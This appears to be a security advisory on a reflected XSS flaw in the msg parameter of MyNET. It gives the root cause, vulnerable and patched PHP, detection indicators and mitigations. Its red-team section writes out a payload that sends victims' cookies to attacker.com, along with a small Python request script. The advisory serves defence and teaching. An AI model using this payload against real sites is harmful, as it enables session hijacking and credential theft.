Executive Summary

CVE-2024-25814 identifies a reflected Cross-Site Scripting (XSS) vulnerability in MyNET, a network management or monitoring solution, up to version 26.05. The flaw resides in the msg parameter, which is not properly sanitized before being reflected back to the user. An attacker can craft a malicious URL containing JavaScript payloads in the msg parameter; when a victim clicks the link, the script executes in the context of the victim's browser session. This can lead to session hijacking, credential theft, or defacement. No official patch has been released, and no public exploit code is available, but the vulnerability is trivial to exploit manually.

Supply Chain & Package Security

This vulnerability is not related to any package manager (NPM, PyPI, Go, Ruby). It is a standalone web application issue.

CVSS Breakdown & Threat Level

While no official CVSS vector is provided, a reasonable assessment based on the nature of reflected XSS is:

  • Attack Vector (AV): Network (N)
  • Attack Complexity (AC): Low (L)
  • Privileges Required (PR): None (N)
  • User Interaction (UI): Required (R)
  • Scope (S): Changed (C)
  • Confidentiality (C): Low (L)
  • Integrity (I): Low (L)
  • Availability (A): None (N)

Estimated CVSS Score: 6.1 (Medium)

Threat Level: Medium. The vulnerability requires user interaction (clicking a link) but can lead to significant impact if exploited in a phishing campaign.

Deep Dive & Mechanics

The vulnerability is a classic reflected XSS. The msg parameter is likely used to display status messages or error notifications to the user. The application takes the value of msg and inserts it directly into the HTML response without proper encoding or sanitization.

Example vulnerable URL:

http://target/mynet/page.php?msg=<script>alert('XSS')</script>

When the server processes this request, it returns a page containing the unescaped script tag. The browser then executes the JavaScript.

Root Cause: Lack of output encoding for user-controlled input in the msg parameter. The application likely uses a function like echo $_GET['msg']; in PHP or similar in other languages without applying htmlspecialchars() or equivalent.

Vulnerable vs. Patched Code

Vulnerable Code (PHP example):

<?php
$msg = $_GET['msg'];
echo "<div class='message'>$msg</div>";
?>

Patched Code (PHP example):

<?php
$msg = $_GET['msg'];
echo "<div class='message'>" . htmlspecialchars($msg, ENT_QUOTES, 'UTF-8') . "</div>";
?>

The patched version uses htmlspecialchars() to convert special characters like <, >, ", ', and & into their HTML entities, preventing script execution.

Exploitation & Lab Setup

Red Team (Attacker)

Manual Exploitation:

  1. Craft a malicious URL:
    http://target/mynet/page.php?msg=<script>new Image().src='http://attacker.com/steal?cookie='+document.cookie</script>

  2. Send the link to a victim via email, social media, or other channels.
  3. When the victim clicks the link, the script executes and sends the victim's cookies to the attacker's server.

Automated Exploitation (using a simple Python script):

import requests

target = "http://target/mynet/page.php"
payload = "<script>alert('XSS')</script>"
params = {'msg': payload}
response = requests.get(target, params=params)
print(response.text)

Blue Team (Defender)

Lab Setup for Testing:

  1. Deploy a local instance of MyNET (version 26.05 or earlier) in a controlled environment.
  2. Use a web application scanner (e.g., OWASP ZAP, Burp Suite) to identify the vulnerable parameter.
  3. Verify the vulnerability by sending a benign payload like <script>alert(1)</script>.

Detection:

  • Monitor web server logs for requests containing <script> tags in the msg parameter.
  • Use a WAF (Web Application Firewall) to block requests with suspicious patterns.

Indicators of Compromise (IOCs)

  • URL Pattern: ?msg=<script>... or ?msg=...<script>...
  • Network Traffic: HTTP requests to the vulnerable endpoint with msg parameter containing JavaScript code.
  • Log Entries: Web server logs showing GET /mynet/page.php?msg=<script>... with a 200 response.
  • Cookie Exfiltration: Outbound connections to attacker-controlled domains from the victim's browser.

Remediation & Mitigation

Immediate Actions:

  1. Input Validation: Validate the msg parameter to only allow expected characters (e.g., alphanumeric and spaces).
  2. Output Encoding: Apply HTML entity encoding to all user-controlled data before rendering it in the response.
  3. Content Security Policy (CSP): Implement a strict CSP header to block inline scripts and restrict script sources.
  4. Web Application Firewall (WAF): Deploy a WAF rule to block requests containing <script> tags in the msg parameter.

Long-Term Fix:

  • The vendor (MyNET) should release a patched version that properly sanitizes the msg parameter. Until then, users must apply the above mitigations manually.

Workaround:

  • If source code access is available, modify the vulnerable code to use htmlspecialchars() or equivalent.
